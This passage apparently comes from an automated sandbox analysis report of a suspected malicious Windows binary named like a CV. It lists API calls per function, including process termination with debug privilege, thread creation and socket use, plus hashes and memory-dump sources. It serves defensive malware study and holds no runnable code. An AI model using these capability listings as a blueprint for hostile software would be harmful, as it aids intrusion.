                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 6348c5f7e98e5bd9d99b8eb279aa6c30c77b17296f22bb6d8e082d538a96bdf5
                                                                                        • Instruction ID: fd749324165d443caf94369db3c02e0fc433e79742abf7b2af55927a5747307f
                                                                                        • Opcode Fuzzy Hash: 6348c5f7e98e5bd9d99b8eb279aa6c30c77b17296f22bb6d8e082d538a96bdf5
                                                                                        • Instruction Fuzzy Hash: D65153B2A092195ADF56EB94D841EDD73BC9F09320F0040AEFA05E7041EA749BC9CF64
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 0039EAEB
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 0039EB32
                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 003FDC86
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 003FDCF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: ff021ebc309a0347851054dc475189df669dcf314287e3d93fad545bdb33d787
                                                                                        • Instruction ID: 11f265c2481e87dc32e38115c8b0109be1b72b2e2234907d9f370492d12d82dc
                                                                                        • Opcode Fuzzy Hash: ff021ebc309a0347851054dc475189df669dcf314287e3d93fad545bdb33d787
                                                                                        • Instruction Fuzzy Hash: 6A411A7161D280DBDF37CB288D8DB3A7A9ABB41302F1B081DF14796965C671B880C315
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB26C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB273
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003BAEF1,00000B00,?,?), ref: 003BB288
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB290
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB293
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003BAEF1,00000B00,?,?), ref: 003BB2A3
                                                                                        • GetCurrentProcess.KERNEL32(003BAEF1,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB2AB
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB2AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,003BB2D4,00000000,00000000,00000000), ref: 003BB2C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: fd15fa8aeeab65505bbf4e9f31326ab57b96c5f4a39abd00872ddb06820b3c34
                                                                                        • Instruction ID: 320dace33e69770c3f7c1890a216d542952d92cc4d80ef89c12c607882e9d76d
                                                                                        • Opcode Fuzzy Hash: fd15fa8aeeab65505bbf4e9f31326ab57b96c5f4a39abd00872ddb06820b3c34
                                                                                        • Instruction Fuzzy Hash: 8701BBB5640304BFE710ABA5DD49F6B7BACEB88711F018421FA05EB1A1CA749C04CB65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: e8d8803a9b79615668aa4dc4f0c610406f5a925a982cc721cc8995c3736ec947
                                                                                        • Instruction ID: 22c9c812a7a0a11a989399004beb19f596b31571e033c9fd9d9b87bf6c33d06c
                                                                                        • Opcode Fuzzy Hash: e8d8803a9b79615668aa4dc4f0c610406f5a925a982cc721cc8995c3736ec947
                                                                                        • Instruction Fuzzy Hash: 06E1A472A2021A9FDF16DFA4E881BAE77B5EF48314F15502AE905AB381D770ED41CB90
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • _wcstok.LIBCMT ref: 003D184E
                                                                                        • _wcscpy.LIBCMT ref: 003D18DD
                                                                                        • _memset.LIBCMT ref: 003D1910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X$p2Cl2C
                                                                                        • API String ID: 774024439-3256438142
                                                                                        • Opcode ID: cfb826c1d9aa496098f73802562c2d9d9143a37b427655fae22a253adec6f679
                                                                                        • Instruction ID: 36030878e110ea7166b5aae9a18499eb311880158185feb33cd3cb45cba88c1f
                                                                                        • Opcode Fuzzy Hash: cfb826c1d9aa496098f73802562c2d9d9143a37b427655fae22a253adec6f679
                                                                                        • Instruction Fuzzy Hash: 2DC19E316043409FC726FF24D991A5AB7E4BF85350F00496EF89A9B3A2DB70EC04CB82
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E9B19
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 003E9B2D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E9B47
                                                                                        • _wcscat.LIBCMT ref: 003E9BA2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E9BB9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E9BE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: e8e59e914aeff0e24e5c7dc1ec44e4cbc0c06aa3e7c4d398e19c05b489384c07
                                                                                        • Instruction ID: 1c0e88c478795dedad3606f16332283c94d7e272c2a71b396189c9ad2eba92ff
                                                                                        • Opcode Fuzzy Hash: e8e59e914aeff0e24e5c7dc1ec44e4cbc0c06aa3e7c4d398e19c05b489384c07
                                                                                        • Instruction Fuzzy Hash: 5241E170900358AFDB229FA4CC85FEE77A8EF08350F11092AF545A72D1D7719D84CB64
                                                                                        APIs
                                                                                          • Part of subcall function 003C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C6554
                                                                                          • Part of subcall function 003C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003C6564
                                                                                          • Part of subcall function 003C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003C65F9
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003E179A
                                                                                        • GetLastError.KERNEL32 ref: 003E17AD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003E17D9
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003E1855
                                                                                        • GetLastError.KERNEL32(00000000), ref: 003E1860
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003E1895
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: bd3aa6ad854528d38664c8ce6ba81aff591851d1d0dd723241c7677fd12699f7
                                                                                        • Instruction ID: 56dbbf1d40907292cf64f93f9d273a5532ee55ed7d2720a649ec037f990dda5b
                                                                                        • Opcode Fuzzy Hash: bd3aa6ad854528d38664c8ce6ba81aff591851d1d0dd723241c7677fd12699f7
                                                                                        • Instruction Fuzzy Hash: 2F41BF75600210AFDB06EF94C8A5FAEB7A5AF44710F05805CF9069F3D2DBB4A9048F51
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 003C58B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: d2e0aeb9f5f22a9e6439e1eab73e93111b30d369edda588dc7ab0109868c07f2
                                                                                        • Instruction ID: 1c7144356dfa7dcc68199a451a1b31bad299fd55192a40ff6f9570402ca06783
                                                                                        • Opcode Fuzzy Hash: d2e0aeb9f5f22a9e6439e1eab73e93111b30d369edda588dc7ab0109868c07f2
                                                                                        • Instruction Fuzzy Hash: 9511D836709B42BEE7165A549C82F6A339CDF29720F20003EF510F6281E764BE804768
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003CA806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: 332b97f14b09141ee7969cdd67973bf5d24ed0115cb6fed7732ddc99a9eb9722
                                                                                        • Instruction ID: 0be06bcdf865d2ac3f9ca38732a76dc864713de7182453252c0b2ea102b601eb
                                                                                        • Opcode Fuzzy Hash: 332b97f14b09141ee7969cdd67973bf5d24ed0115cb6fed7732ddc99a9eb9722
                                                                                        • Instruction Fuzzy Hash: DDC16B75A0461A9FDB02CF98D585BAEBBF4FF08319F20406EE606EB251D734AD41CB91
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C6B63
                                                                                        • LoadStringW.USER32(00000000), ref: 003C6B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C6B80
                                                                                        • LoadStringW.USER32(00000000), ref: 003C6B87
                                                                                        • _wprintf.LIBCMT ref: 003C6BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C6BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 003C6BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 068a78d5f62f97d1eef208651743ca3f89f125df21e09afbec46791eeb39da40
                                                                                        • Instruction ID: 3a3571c89290d16e09e3fa6b3d087bdf8f52e8cf310e37601c283472f66f277c
                                                                                        • Opcode Fuzzy Hash: 068a78d5f62f97d1eef208651743ca3f89f125df21e09afbec46791eeb39da40
                                                                                        • Instruction Fuzzy Hash: 5801E6F69002187FE711ABD49D89FFB776CD708305F0045A5B745E6041EA749E888F75
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E2BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 1def700ce837698ee835c2027d2538b3446df4569047c31c9a78e0354126e325
                                                                                        • Instruction ID: ed75853d539402254688d1c4a44d6e0270297fd9d04f3d16ce1df140e4eae334
                                                                                        • Opcode Fuzzy Hash: 1def700ce837698ee835c2027d2538b3446df4569047c31c9a78e0354126e325
                                                                                        • Instruction Fuzzy Hash: 87918A316042019FCB02EF55C891B6FB7E9FF88314F04895DF99A9B2A1DB70E905CB42
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 003D9691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003D96C8
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D96E9
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D96F8
                                                                                        • inet_ntoa.WSOCK32(?), ref: 003D9765
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 003D97AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 500251541-0
                                                                                        • Opcode ID: 5fd7bb3edb40734799eaa3369c64945eda8c18382f050c173116df5caebca852
                                                                                        • Instruction ID: b27d5b0aac42c9a1c0fbd338367bf847cb33be5ecc758bc23179352e46b1a304
                                                                                        • Opcode Fuzzy Hash: 5fd7bb3edb40734799eaa3369c64945eda8c18382f050c173116df5caebca852
                                                                                        • Instruction Fuzzy Hash: A471AC32504200ABC716EF64DC85F6BB7E9EF85714F104A2EF556AB2A1EB30DD04CB62
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 003AA991
                                                                                          • Part of subcall function 003A7D7C: __FF_MSGBANNER.LIBCMT ref: 003A7D91
                                                                                          • Part of subcall function 003A7D7C: __NMSG_WRITE.LIBCMT ref: 003A7D98
                                                                                          • Part of subcall function 003A7D7C: __malloc_crt.LIBCMT ref: 003A7DB8
                                                                                        • __lock.LIBCMT ref: 003AA9A4
                                                                                        • __lock.LIBCMT ref: 003AA9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00436DE0,00000018,003B5E7B,?,00000000,00000109), ref: 003AAA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00436DE0,00000018,003B5E7B,?,00000000,00000109), ref: 003AAA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 003AAA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: 850fd5b4fc1f24a93a9208fcbbd3be889c9f6b7a3642ad2134d2a099ec62d944
                                                                                        • Instruction ID: 7cb9c501113678424da07a356704d8f655cbe058091b37023afea48d1815bc6a
                                                                                        • Opcode Fuzzy Hash: 850fd5b4fc1f24a93a9208fcbbd3be889c9f6b7a3642ad2134d2a099ec62d944
                                                                                        • Instruction Fuzzy Hash: 7D415872A00A059BEB12DFA8CA4575CB7F0EF03334F15822DE525AF2D2D7749810CB96
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 003E8EE4
                                                                                        • GetDC.USER32(00000000), ref: 003E8EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E8EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003E8F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003E8F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E8F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003E8F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E8FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: d23f006f68b524ce3e2b95602ae3bd69eb7624ed00b473ac85a25a27196b3cee
                                                                                        • Instruction ID: c4bc0ee46edde697e14fce38f8881368f512803c4e9cc6e95f41dd2393d39312
                                                                                        • Opcode Fuzzy Hash: d23f006f68b524ce3e2b95602ae3bd69eb7624ed00b473ac85a25a27196b3cee
                                                                                        • Instruction Fuzzy Hash: 5131C072500214BFEB118F94CD49FEB3BADEF49715F044164FE08EA191CA759842CB74
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 003F016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003F038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003F03AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003F03D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003F03FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 003F0421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 003F0440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: c4ffe4e49dba205e456ef72845f3bdae2f548dd313ab022c5230b16460d584eb
                                                                                        • Instruction ID: be009657a9836d945f0d20836f57ffacdd7118647e41e0c1e50cd6612f70e0e8
                                                                                        • Opcode Fuzzy Hash: c4ffe4e49dba205e456ef72845f3bdae2f548dd313ab022c5230b16460d584eb
                                                                                        • Instruction Fuzzy Hash: 0BA1AE3960061AEBDB1DCF6CCA857BDBBB1BF08741F058126EE54AB291D734AD50CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
